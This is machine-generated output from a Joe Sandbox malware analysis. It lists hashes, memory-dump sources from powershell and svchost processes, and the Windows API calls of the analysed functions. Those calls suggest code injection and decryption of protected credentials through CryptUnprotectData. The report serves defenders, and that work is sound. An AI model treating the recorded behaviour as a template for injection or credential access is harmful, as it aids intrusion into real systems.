                                                                                                                • Opcode ID: fb08931ca17622553451f4f3cde106a5d9152bb97f6cb4cae95623e42629030d
                                                                                                                • Instruction ID: 7420f72fe8ed99f9ee265ed0866bbf83ef9a39662b16e65b62fa3262d2872ea1
                                                                                                                • Opcode Fuzzy Hash: fb08931ca17622553451f4f3cde106a5d9152bb97f6cb4cae95623e42629030d
                                                                                                                • Instruction Fuzzy Hash: 3DF06272505344AEE7108E16D984B66FF9CEB81734F18C55AED484E286C3B9A845CAB1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2677120352.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_4d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e154bd4fd0a8b639c30aa90697893befdce7695c2cb1ef6549bb8c37cfc0cf24
                                                                                                                • Instruction ID: 1447b496f0f2ddff64cf3f4f1055ef53472b056135ec4ca74585b5d7914163dc
                                                                                                                • Opcode Fuzzy Hash: e154bd4fd0a8b639c30aa90697893befdce7695c2cb1ef6549bb8c37cfc0cf24
                                                                                                                • Instruction Fuzzy Hash: 7E01EC75A00109DFCF14CF98C9909ADF7B2FF88324B248669D919E7655C732BC52CB94
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a48928fb35c16e4b8f33fa9df20ede6ea661aabdb854c1c4953c345ede0587d1
                                                                                                                • Instruction ID: 9802ce62523c0c10bd6a11e0704c972ebd800f63935cd605979d24059e0622db
                                                                                                                • Opcode Fuzzy Hash: a48928fb35c16e4b8f33fa9df20ede6ea661aabdb854c1c4953c345ede0587d1
                                                                                                                • Instruction Fuzzy Hash: 59E09AB060A2818FE3669B04C844AA0BB71FB82302F0CC0EBD0088F1A3CB36DC46CB55
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2675313851.0000000004BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BED000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_4bed000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7e5f50a2f761514ca3a1f607515e32bc3ac5f81945129be5e8691d37a72e9b1f
                                                                                                                • Instruction ID: 15c91dfc5a44705ccef8890eb6c6dfcb910d08ee4d9411bf2a457e2b5be529c7
                                                                                                                • Opcode Fuzzy Hash: 7e5f50a2f761514ca3a1f607515e32bc3ac5f81945129be5e8691d37a72e9b1f
                                                                                                                • Instruction Fuzzy Hash: F72127B2604241DFD704DF25D580B3ABBA9EBC4724F2085ADD5094B241E7B9E406D662
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (fRl$(fRl$(fRl$(fRl$4Ol$4Ol$tLDk
                                                                                                                • API String ID: 0-3757837175
                                                                                                                • Opcode ID: 4233c6b0cf2e01bd50831b309292bb392b9dba8e75edff364cbc32a5611f6a7a
                                                                                                                • Instruction ID: a9fe2b8fd6b835c5142fbb025a0c7faea68a1dd5be2cc708246a4fddeaf2b932
                                                                                                                • Opcode Fuzzy Hash: 4233c6b0cf2e01bd50831b309292bb392b9dba8e75edff364cbc32a5611f6a7a
                                                                                                                • Instruction Fuzzy Hash: 5E61B1F4B01209DBEB54EB68C450E6ABBE2EFC4714F1480A9D405AB745DF36EC41CBA2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (fRl$(fRl$(fRl$(fRl
                                                                                                                • API String ID: 0-3082660454
                                                                                                                • Opcode ID: 67c9f5b16cd2f198ed12b2ae2bcb9c4504af4581daf5e9ea0aaff05314e507bd
                                                                                                                • Instruction ID: e72f1413b84f72c49c9f50194040a976ea33f12b713b57d227917bdc56e29ee9
                                                                                                                • Opcode Fuzzy Hash: 67c9f5b16cd2f198ed12b2ae2bcb9c4504af4581daf5e9ea0aaff05314e507bd
                                                                                                                • Instruction Fuzzy Hash: 77717EF4A00205DFE754DFA8C845A6ABBE2EF89318F2480A9D905AB755CF35EC41CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2706564195.0000000007B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7b80000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (fRl$(fRl$4Ol$tLDk
                                                                                                                • API String ID: 0-929405171
                                                                                                                • Opcode ID: 581459c0ef35d6addaff23402da62b4718ebd3a4f7414af57c83277a13172812
                                                                                                                • Instruction ID: d8b8527e90974e111694620e7e09180fabe82ddb3fa7a7265f1a120775d313bc
                                                                                                                • Opcode Fuzzy Hash: 581459c0ef35d6addaff23402da62b4718ebd3a4f7414af57c83277a13172812
                                                                                                                • Instruction Fuzzy Hash: 2951C0F4A01206DFEB54DF54C440AAABBF2EF85314F18C0A9D804AB751CB36E841CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2677120352.0000000004D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D90000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_4d90000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: q$q$q$q
                                                                                                                • API String ID: 0-594874556
                                                                                                                • Opcode ID: 4c73f6527299438f8a7b877d11ef08c6d29f959711f8f4c5382fae408ea2f2fe
                                                                                                                • Instruction ID: dabd5a9fdbbab6df71d345f6b8341cef45a23e63710de13bf20012e2e8e76bcf
                                                                                                                • Opcode Fuzzy Hash: 4c73f6527299438f8a7b877d11ef08c6d29f959711f8f4c5382fae408ea2f2fe
                                                                                                                • Instruction Fuzzy Hash: 6F01192690E3E65FE7035A3858352EA3FA04F63214F4A01E7C895CF0D3E59C5859D35A
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,?,?), ref: 02FC0326
                                                                                                                  • Part of subcall function 02FC00A4: VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 02FC00CD
                                                                                                                  • Part of subcall function 02FC00A4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02FC0279
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00400000,00001000,00000004), ref: 02FC0378
                                                                                                                • VirtualProtect.KERNELBASE(0000002C,?,00000040,?), ref: 02FC03E7
                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02FC0407
                                                                                                                • MapViewOfFile.KERNELBASE(?,00000004,00000000,00000000,00000000), ref: 02FC042E
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02FC0456
                                                                                                                • CloseHandle.KERNELBASE(?), ref: 02FC0471
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000003.2900102025.0000000002FC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_24_3_2fc0000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$Alloc$Free$CloseFileHandleProtectView
                                                                                                                • String ID: ,
                                                                                                                • API String ID: 3867569247-3772416878
                                                                                                                • Opcode ID: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                • Instruction ID: 665bb4b2965d08ce286344005e3c7395cf248140540d5bc31065ac4cfc109bae
                                                                                                                • Opcode Fuzzy Hash: 35eb397ea14406336b01ea38f36e06f8461e94550e7b98cd084062937234d485
                                                                                                                • Instruction Fuzzy Hash: 8961ECB5D00209EFDB10DFA5CA84A9EBBB9FF08354F24852DEA59A7240D770A941CF60
                                                                                                                APIs
                                                                                                                • VirtualAlloc.KERNELBASE(00000000,00001012,00001000,00000004), ref: 02FC00CD
                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 02FC0279
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000003.2900102025.0000000002FC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_24_3_2fc0000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$AllocFree
                                                                                                                • String ID:
                                                                                                                • API String ID: 2087232378-0
                                                                                                                • Opcode ID: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                • Instruction ID: dd541a9270e8fed6364cf2a14b09bf4a0255631986df7cbc1c9ee73ce0ae9f19
                                                                                                                • Opcode Fuzzy Hash: 7dc8e79fde86babc96161718fc4e5f80a5398d7d893a888eaa0e52eee754c683
                                                                                                                • Instruction Fuzzy Hash: 15717D71E0424ADFDB41CF98C981BEDBBF0AB09354F244099E565F7241C734AA92CF65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000018.00000003.2900102025.0000000002FC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02FC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_24_3_2fc0000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                • Instruction ID: b5ef4c3a19f81bcdcd8845bfc337ab73319316d3ca878f11e6f222bb360ff577
                                                                                                                • Opcode Fuzzy Hash: d558d006f42668ff0cb3938fe5626bc0e09627662ae6e14989234e2d35bd114b
                                                                                                                • Instruction Fuzzy Hash: 75F0AF75B01201DF8724CF09C6448E577B6EB80794B3444ADD504AB265D770DD46CB60

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:23.7%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:45%
                                                                                                                Total number of Nodes:20
                                                                                                                Total number of Limit Nodes:0
                                                                                                                execution_graph 418 20d09dc19b4 419 20d09dc19c7 418->419 420 20d09dc19fb 419->420 421 20d09dc19e6 VirtualFree 419->421 421->420 422 20d09dc1cf4 424 20d09dc1d19 422->424 423 20d09dc1fa1 424->423 431 20d09dc15c0 424->431 426 20d09dc1f98 CloseHandle 426->423 427 20d09dc1f88 NtAcceptConnectPort 427->426 428 20d09dc1e3a 428->426 428->427 434 20d09dc1aa4 428->434 430 20d09dc1f76 430->427 432 20d09dc15f4 NtAcceptConnectPort 431->432 432->428 435 20d09dc1aef 434->435 437 20d09dc1b10 435->437 438 20d09dc1870 435->438 437->430 440 20d09dc1889 438->440 439 20d09dc1949 439->437 440->439 441 20d09dc1930 GetProcessMitigationPolicy 440->441 441->439

                                                                                                                Callgraph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort$DuplicateHandlecallocfree
                                                                                                                • String ID: ,$,$H$H
                                                                                                                • API String ID: 2459737528-3578512806
                                                                                                                • Opcode ID: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                • Instruction ID: ce7181e7bfe6f686dc79c5882ea3a9da1f990d31f2efeeba52f6556b60e6967f
                                                                                                                • Opcode Fuzzy Hash: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                • Instruction Fuzzy Hash: A502823065CF948FD764DB58D8846AAB7E1FFD8340F104A3EE18EC3291DB34A9458B92
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPathPort$NameName_freemalloc
                                                                                                                • String ID: $0$@
                                                                                                                • API String ID: 3298263305-2347541974
                                                                                                                • Opcode ID: 41dfd5aa33c42447b157757b265737d871a333bd75be70a4a10737d4b23bee9e
                                                                                                                • Instruction ID: 4575839278b201ef754738c13446cc2592965266ef241e722a8cb65095cd696e
                                                                                                                • Opcode Fuzzy Hash: 41dfd5aa33c42447b157757b265737d871a333bd75be70a4a10737d4b23bee9e
                                                                                                                • Instruction Fuzzy Hash: 4351A034558B888FD764DF5494857AAB7E4FF89340F20462EE49EC2241DB78E485CB83
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPortfree
                                                                                                                • String ID: $0$@
                                                                                                                • API String ID: 2184535508-2347541974
                                                                                                                • Opcode ID: 3f154c0dcd698207b74ecbf3349ee8280ba9b90b83e006a876e2d17fed3398f1
                                                                                                                • Instruction ID: fadddef272d6d99f2fdfb2aa2de7b51acde1e2f01db5e1c22f5feb5a0edd36f2
                                                                                                                • Opcode Fuzzy Hash: 3f154c0dcd698207b74ecbf3349ee8280ba9b90b83e006a876e2d17fed3398f1
                                                                                                                • Instruction Fuzzy Hash: 21513A7060CB898FE765DFA8D4547ABB7E5FF98341F200A2EA58EC2250DB74D4448B52
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$DirectoryFirstNextRemove
                                                                                                                • String ID: \
                                                                                                                • API String ID: 2722548352-2967466578
                                                                                                                • Opcode ID: aa0ec3aa504d6ef0e5320522a7ffa5ee1f0828fe674872a74d1c1d53faa5203f
                                                                                                                • Instruction ID: 0bd88f04f07293690a3bb414690a8d6831c679a4976235f47c30ef1aa3e49c06
                                                                                                                • Opcode Fuzzy Hash: aa0ec3aa504d6ef0e5320522a7ffa5ee1f0828fe674872a74d1c1d53faa5203f
                                                                                                                • Instruction Fuzzy Hash: 2D41AC312489888FDB45EF68DCC8ADA77A5FF94741F240766D40BDA164DF38A844CB80
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$Create$CodeDesktopExitTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 3114477661-0
                                                                                                                • Opcode ID: d9c65f78b88761f55749ee4c73d5915ec55cc6603792b3611b226317cd9e6f4d
                                                                                                                • Instruction ID: 21651d6d6825f747af92d23b04786e6114eaa696e9ad741b85121ed5125a964f
                                                                                                                • Opcode Fuzzy Hash: d9c65f78b88761f55749ee4c73d5915ec55cc6603792b3611b226317cd9e6f4d
                                                                                                                • Instruction Fuzzy Hash: 89715D3151CA988FE764DF68D8987ABB7E5FF94351F10062EE48EC3190DF7894418B42
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                                                                                                • String ID:
                                                                                                                • API String ID: 2502124517-0
                                                                                                                • Opcode ID: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                • Instruction ID: 6315eee15f98e454c3443dc95aa7f2b154537ff96e8e5fe4fbdfb79bedb5c352
                                                                                                                • Opcode Fuzzy Hash: 64bc60262aa007af45c0078f76809d5417a24a6d2b7390d918a99979fd05e311
                                                                                                                • Instruction Fuzzy Hash: 84318F30608A488FE794DF68D8D879A77E5FF98310F50472BE49BC21D0DB38D9858B92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleSuspendThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1038686644-0
                                                                                                                • Opcode ID: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                • Instruction ID: f87bb6144818718acf62647007f9c95acab3d4137954fa2f9f59d11bf50090c4
                                                                                                                • Opcode Fuzzy Hash: 1f8ece1503dc4297b761fc8aeeb38f081f212776847475056979e89073c5c51b
                                                                                                                • Instruction Fuzzy Hash: D0910730A4CE554BDB689B18D8512BA73F1FF58350F68426ED08FC7185DB3AE882CB91

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.3444451166.0000020D09DC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020D09DC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_20d09dc0000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptCloseConnectHandlePort
                                                                                                                • String ID:
                                                                                                                • API String ID: 3811980168-0
                                                                                                                • Opcode ID: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                • Instruction ID: 5d0f073df697a51328ae432b775ddf9f4f90307688d9d39276d6e47fa5ef58d8
                                                                                                                • Opcode Fuzzy Hash: c28fd07678fc221e1754ee083f118103e9e8097afeb12f13d48dc470bfa4e84b
                                                                                                                • Instruction Fuzzy Hash: 0791B070548B198FDB64EF58C4857E5B3E2FBA8310F14465AE48FC7297EA34A8438B91
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 31276548-0
                                                                                                                • Opcode ID: 4604594dd80deaa7dc65681505de0cd38ecb63ec40db0f49576e2dc26c5e6384
                                                                                                                • Instruction ID: 48a4072c74058b1b034bf41263b4a97248f1a63cfdc8a07f5652aac0a37f1902
                                                                                                                • Opcode Fuzzy Hash: 4604594dd80deaa7dc65681505de0cd38ecb63ec40db0f49576e2dc26c5e6384
                                                                                                                • Instruction Fuzzy Hash: 0651E93065CE4D4FEB55AA6C94583AA72E1FF98381F20023BE44FC3195DF7AE8858791
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CryptDataUnprotect
                                                                                                                • String ID:
                                                                                                                • API String ID: 834300711-0
                                                                                                                • Opcode ID: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                • Instruction ID: dfe9187db35f08865baa481def99938004ee0922484b54fae0af048bdf35a6ef
                                                                                                                • Opcode Fuzzy Hash: 856649e5fd06967893b9de20f468b6bbeb41857baffe77d0d88ed87af2e6e484
                                                                                                                • Instruction Fuzzy Hash: 2731803075CA488FE744EB68D8596AAB7E1FF88341F50462FF44EC3291DB39E8418752

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,00000000,0000020D09DC1E3A), ref: 0000020D09DC1654
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000002.3444451166.0000020D09DC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000020D09DC0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_2_20d09dc0000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                • Instruction ID: 59596e054de4740dacc29abf6e327bf69df1c63ea872a54222fadc92081a25e9
                                                                                                                • Opcode Fuzzy Hash: 1eb38bd4e9810c4692bda8c47b34b9a63fb6abd40dd4841afe63035e04063970
                                                                                                                • Instruction Fuzzy Hash: CF215BB1548B098FDB58DF58C489A6AF7E2FBB8305F140A6EF44AC6262DB30D485CB41
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 04777103404d42a3d8809544d07e3f94752c09d4e382fb2d5f2ce09ccce6d52b
                                                                                                                • Instruction ID: 9c6db4dbe250d76bf07c955cbbcac031e003a0cf9d5bc57f493454078871d812
                                                                                                                • Opcode Fuzzy Hash: 04777103404d42a3d8809544d07e3f94752c09d4e382fb2d5f2ce09ccce6d52b
                                                                                                                • Instruction Fuzzy Hash: D2F06634A5C7C48FD7A0DB688585B9ABBF0BB9A344F545A1EE4CCC3211D73594848B53
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 4cf3975fe2f826ffe67f273e2a1973cf5c2994fe7bf33f6883edfc4130774661
                                                                                                                • Instruction ID: d0be71fcdc9cdf154250011d784784421f5c002540e6869326fac87d118c50e4
                                                                                                                • Opcode Fuzzy Hash: 4cf3975fe2f826ffe67f273e2a1973cf5c2994fe7bf33f6883edfc4130774661
                                                                                                                • Instruction Fuzzy Hash: F3F0BD30A1CB848FDF64EB6CD489B99B7E1FB99300F504519E84CC3245DB3498808B86
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 5596204144bf6387c6881bf1fa4f57717ef6e785025276df84d2fa40d30d7839
                                                                                                                • Instruction ID: 0896d5d11ccc1e31786c7ccad482c46473820e52ad7611158caed50e82f4ffeb
                                                                                                                • Opcode Fuzzy Hash: 5596204144bf6387c6881bf1fa4f57717ef6e785025276df84d2fa40d30d7839
                                                                                                                • Instruction Fuzzy Hash: EEE09B71658A448FDB04DF94C8C15AAB7F0EBD8340F104D7AE94FCB164D365D688C652
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: c0f707815c29bc5e42aa1d0e63f012e02fb8cc729e2b5fa34e6064e28ee2c0b2
                                                                                                                • Instruction ID: 9aca1eb53bd2eb6e057ede3838cb8055ee88951ca5ef829edbdfc27a84bb493a
                                                                                                                • Opcode Fuzzy Hash: c0f707815c29bc5e42aa1d0e63f012e02fb8cc729e2b5fa34e6064e28ee2c0b2
                                                                                                                • Instruction Fuzzy Hash: 77D05E30E68AD94FDA10A768884075637E1FBA9344FA04614D44DC7200E23CE4808782
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: 3ea98e83cefaff0a53491c51114555ceb5585970405d7fffab8276f48ff2d2ab
                                                                                                                • Instruction ID: 9a7abb8de7c2dd45e4dfa8debc81d9eccac94ccb0758477f6f758d68cdc4e9b5
                                                                                                                • Opcode Fuzzy Hash: 3ea98e83cefaff0a53491c51114555ceb5585970405d7fffab8276f48ff2d2ab
                                                                                                                • Instruction Fuzzy Hash: 13C08C00E68C0A5EEB04A2FA8C8079B20E0AF4C380F900120E80EC2180E65CE4C083A2
                                                                                                                APIs
                                                                                                                • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00007DF415A9C0F7), ref: 00007DF415A9E160
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AcceptConnectPort
                                                                                                                • String ID:
                                                                                                                • API String ID: 1658770261-0
                                                                                                                • Opcode ID: af8779bb09c2e78d507a3ecc3102d682b92eeb4da621b6902aa3ae21c98f3f52
                                                                                                                • Instruction ID: 383809a66ad9879586edf1e44a19aa7737e2b7bd0ef99c5a42be5d055f3fd0fe
                                                                                                                • Opcode Fuzzy Hash: af8779bb09c2e78d507a3ecc3102d682b92eeb4da621b6902aa3ae21c98f3f52
                                                                                                                • Instruction Fuzzy Hash: CBC08C20E98D1B8FEE0872EA4C8038621E0AF5CB90FA00111960EC6180EA0CE4C043A2
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000019.00000003.3443510122.00007DF415A71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF415A71000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_25_3_7df415a71000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: freemalloc
                                                                                                                • String ID: x
                                                                                                                • API String ID: 3061335427-2363233923
